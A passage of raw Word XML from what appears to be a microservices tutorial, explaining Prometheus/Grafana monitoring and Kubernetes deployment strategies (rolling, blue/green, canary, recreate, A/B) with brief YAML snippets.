          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to notify you if any service's error rate exceeds a threshold or if latency becomes too high, so you can take action proactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6084B10C"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906654">
          <v:rect id="_x0000_i3027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D89113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Using Prometheus and Grafana for Microservices Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67695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r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus scales well in microservices architectures, where services are constantly added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104105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Insights</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus enables real-time monitoring of service health and performance, and Grafana provides intuitive visualizations for easy analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C75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With both Prometheus and Grafana, you can set up automated alerts for operational anomalies, ensuring that you can respond to issues promptly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D37B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nified View</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana aggregates data from multiple services and data sources, giving you a unified view of your entire system's health and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2430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lexible Querying</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus's powerful query language (PromQL) allows you to generate detailed insights into service behavior, while Grafana helps visualize these insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364D69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258D0">
          <v:rect id="_x0000_i3028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E886A7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26A3A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3029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1591F1" w14:textId="578A46B6" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A58EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="722" w:name="_Toc197867936"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Kubernetes deployment strategies for microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="722"/>
    </w:p>
    <w:p w14:paraId="6E503C1B" w14:textId="5E6A839C"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key Kubernetes deployment strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commonly used in microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1189087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91D1E">
          <v:rect id="_x0000_i3030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117B8D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Rolling Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A0B1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3F39BF0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updates the pods in a controlled manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2563224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old pods are gradually replaced with the new ones, ensuring that a minimum number of pods remain running at all times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727BE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update process continues until all old pods have been replaced with the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAE57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F01A08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s the update is gradual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7851F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to roll back to the previous version if issues occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECE1AC"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009A49C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update</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updating a microservice (e.g., a payment service) while ensuring that it remains functional and available throughout the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0CCC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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181124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64B52C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5831D5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20A61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434C9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6D0BDCB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7B2031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1D078DD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45D8D57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2A81C2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F0A7A5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6003846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1FAB9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0AB241C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739107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1DE0F0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5983AFF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payment-service:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C032E8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11C3AD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030B4A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632FB0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ollingUpdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37919C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ollingUpdate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682602F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Unavailable: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154DE65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Surge: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688ACBE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EED94">
          <v:rect id="_x0000_i3031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC77F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Blue/Green Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C540B6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two environments are maintained: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current live version) and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Green</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment (new version). The traffic is switched from the old version (Blue) to the new version (Green) when the new version is verified to be stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46A79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049739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wo identical environments (Blue and Green) are set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B07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Blue environment runs the current stable version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE00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Green environment runs the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8B20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testing and verification, the traffic is switched to the Green environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2362EAA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ise in the Green environment, traffic can be easily switched back to the Blue environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1957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175EB21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rollback: If the new version in the Green environment has issues, you can easily switch back to Blue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E221D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nd low risk for production deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C395C58"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4F9885F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gh-risk updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you are updating critical microservices such as payment processing services and want to ensure minimal risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29593BF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F5D37C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eploy the new version of the service in the Green environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631EC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the service traffic to the Green environment using a Kubernetes Service or Ingress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14487D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Once verified, remove or scale down the Blue environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF7D6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DD0CE7">
          <v:rect id="_x0000_i3032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="537BDAD3"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Canary Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51869FC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551C497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 small portion of the traffic is routed to the new version of the service (the canary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A33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the canary version performs well, the new version is gradually rolled out to a larger portion of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C5E3C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e detected with the canary, the rollout is halted, and the previous version remains in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC0F40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475EB8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Reduces the risk of introducing bugs by testing with a smaller audience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D773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ier to troubleshoot, as issues can be isolated to the canary users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7FF0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2A3D2C3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feature release</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rolling out a new feature in a microservice to a small user base first, like a new checkout process in an e-commerce service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D61AA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3BC8C53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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes label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 For example, you could direct 90% of traffic to the stable version (Blue) and 10% to the new version (Green):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041CA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70E312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68089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5C304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444FE5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483013A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76E1B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61261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1A32659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1A70AE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FE11B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29EF10D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5365D8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51E63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79E2045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6ECC5A8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BB16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145D5A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C64845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736A4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2649E083"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4ADFE">
          <v:rect id="_x0000_i3033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B36C07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Recreate Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E820B3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A0C6B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first kills all the running pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49878C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n it creates new pods with the updated version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701ED5F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A035D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ful when the application requires a clean restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1624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r to implement for applications that do not require high availability during the update process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527890B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655DA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pplications with database schema migrations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your microservice is making significant changes to the database schema that require a fresh start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6297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256227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419EC92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0398C9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1772FF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31CC73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0B66A52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BDB4E9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2762ED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19343D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4176AF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116FBC5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0698D59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47752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40660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          image: payment-service:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C695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716A35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128D3C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4F5F51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ecreate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD38D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D3CC54">
          <v:rect id="_x0000_i3034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439ED6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A/B Testing Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55D18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F1BAC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ultiple versions of a service (Version A, Version B, etc.) are deployed in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1D3D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raffic is split between the versions based on predefined criteria (e.g., user segments, random distribution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819CD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nalytics are used to compare the versions, and the version with the better performance is chosen for full-scale deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F0901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37D591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Helps in choosing the best version based on real user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173094F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vides insights into user preferences and application performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEB0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3D59CFA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comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Comparing two variations of a checkout process in an e-commerce service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EF22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61BE7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an be implemented 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Traefik</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for advanced traffic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07876235"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2914D">
          <v:rect id="_x0000_i3035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF3E0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7C8C7EC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Kubernetes offers several deployment strategies for managing the release of microservices in production environments. The choice of strategy depends on the requirements for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>availability, risk tolerance, and rollback mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here is a brief summary of when to use each strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E823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Gradual updates without downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B09B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Safe switch between versions with easy rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4579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Gradual rollout with early feedback to minimize risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EB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Useful when a full restart is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B617E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Comparing multiple versions to select the best-performing one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76460D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selecting the appropriate deployment strategy for each use case, microservices can be deployed, updated, and scaled in Kubernetes efficiently, minimizing downtime and ensuring system stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE48E5" w14:textId="7976F42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3036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E938D3" w14:textId="337B57A2" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="0016094F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="723" w:name="_Toc197867937"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Blue-Green and Canary deployments in microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="723"/>
    </w:p>
    <w:p w14:paraId="250CDEE3" w14:textId="7CA63FC6"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A78B1">
          <v:rect id="_x0000_i3037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2116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Blue-Green Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853537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a strategy where you maintain two identical environments: one for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>current version</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Blue) and another for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new version</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Blue-Green Deployment Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71152D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This is the live production environment, serving the existing version of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FF17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This is where the new version of the application is deployed and tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312EE1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the new version is verified and ready for production, the traffic is switched from Blue to Green (usually through a load balancer or DNS update).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B6B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remains idle or can be used for staging or testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87FC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ny issues arise after switching traffic, the system can be rolled back to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quickly by rerouting traffic back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF443E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Blue-Green Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD8EF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Zero downtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the Blue environment is still running during the deployment, there is no downtime for users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3883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y rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If something goes wrong, switching back to the Blue environment is simple and quick.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D1C3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Stable production</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The old version is fully functional and serves users while the new version is being tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624138D5"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B2E3A1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When deploying critical services that cannot afford downtime (e.g., payment gateway service, login service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37766D3A"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54915D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Running version 1 of the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD70BA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Running version 2 of the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E60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successful testing in the Green environment, you reroute traffic from Blue to Green.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA911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A0215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5CFC973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1410D2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green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2E0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5E8572D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4094CC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276B802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6220ED2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2437C5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0A9A8D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62C602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4F71781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4F18952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D1E8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17F83F7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29A83AC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5E4EA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2A1708C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0B8AE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580E6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3A93F8F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51C68">
          <v:rect id="_x0000_i3038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C347D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Canary Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7E5B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a strategy where a new version of the application is gradually rolled out to a small subset of users (known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary group</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) before being deployed to the entire production environment. The main goal of canary deployments is to test the new version in a real-world scenario with limited exposure to catch issues early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24527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Canary Deployment Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C161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itial Canary Release</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A small percentage of traffic (e.g., 5-10%) is routed to the new version of the service (the "canary").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268440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The performance of the canary version is closely monitored to detect any issues, such as bugs or degraded performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25077C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dual rollout</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the canary version performs well, the percentage of traffic routed to the new version is gradually increased.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3DCD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ull rollout</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the new version has been verified and proven stable, it can be fully rolled out to all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF20DF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Canary Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E03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duced risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By releasing the update to only a small group of users initially, the risk of widespread failures is minimized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FEF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You can quickly identify bugs or performance issues in a limited scope before they affect the entire user base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA23A6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ntinuous monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The gradual rollout allows continuous monitoring and comparison between the old and new versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7979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5D6EBC8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testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rolling out a new feature in a microservice to a subset of users to gather real-world feedback before full-scale release (e.g., a new recommendation algorithm in an e-commerce platform).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43E7A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41BC7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implement Canary deployments using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
